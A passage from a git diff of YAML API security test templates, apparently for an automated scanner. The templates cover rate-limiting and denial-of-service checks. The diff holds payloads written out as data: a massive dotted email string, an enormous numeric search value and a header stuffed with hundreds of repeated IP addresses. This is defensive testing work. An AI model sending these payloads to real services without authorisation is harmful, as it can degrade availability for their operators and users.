a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a@a@a.com" + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/ExpensiveSearch.yml b/Lack-of-Resources-and-Rate-Limiting/ExpensiveSearch.yml index 12c34100f..885d262de 100644 --- a/Lack-of-Resources-and-Rate-Limiting/ExpensiveSearch.yml +++ b/Lack-of-Resources-and-Rate-Limiting/ExpensiveSearch.yml @@ -69,12 +69,12 @@ api_selection_filters: for_one: key: regex: "(^q$|^query$|^search$|^keyword$)" - extract: searchKey + extractMultiple: searchKey - query_param: for_one: key: regex: "(^q$|^query$|^search$|^keyword$)" - extract: searchKey + extractMultiple: searchKey wordLists: searchParamValues: - "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" @@ -127,9 +127,11 @@ execute: - failure: exit - req: - modify_query_param: - searchKey: ${searchParamValues} + ${searchKey}: ${searchParamValues} + for_each_combination: true - modify_body_param: - searchKey: ${searchParamValues} + ${searchKey}: ${searchParamValues} + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/HTTPHeaderInjectionDoS.yml b/Lack-of-Resources-and-Rate-Limiting/HTTPHeaderInjectionDoS.yml index 44abc8cf4..f444618e3 100644 --- a/Lack-of-Resources-and-Rate-Limiting/HTTPHeaderInjectionDoS.yml +++ b/Lack-of-Resources-and-Rate-Limiting/HTTPHeaderInjectionDoS.yml @@ -67,7 +67,7 @@ api_selection_filters: for_one: key: regex: "^X-Forwarded-For$|^X-Real-IP$|^X-Forwarded-Host$|^X-Cluster-Client-IP$|^Forwarded$|^CF-Connecting-IP$|^True-Client-IP$|^X-Original-Forwarded-For$|^X-Client-IP$|^Client-IP$|^X-Azure-Client-IP$|^X-Azure-ClientIP$|^X-Akamai-Client-IP$|^X-Originating-IP$|^X-Remote-IP$|^X-Appengine-User-IP$|^Via$|^X-Host$|^X-ProxyUser-Ip$|^X-Forwarded$|^X-Real-IP-From$|^CF-Connecting-IPv6$|^Remote-Addr$|^X-Client-Public-IP$|^X-Forwarded-For-IP$|^X-Cloudflare-CDN-Loop$|^X-Coming-From$|^X-Originating-URL$|^X-Client-Connection-IP$" - extract: userKey + extractMultiple: userKey value: regex: "\b(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" extract: userVal @@ -85,7 +85,8 @@ execute: - failure: exit - req: - modify_header: - userKey: "1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1" + ${userKey}: "1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1, 1.1.1.1" + for_each_combination: true - validate: response_code: gt: 505 diff --git a/Lack-of-Resources-and-Rate-Limiting/QueryParamArrayBombingDoS.yml b/Lack-of-Resources-and-Rate-Limiting/QueryParamArrayBombingDoS.yml index 51adde715..c4b3bd943 100644 --- 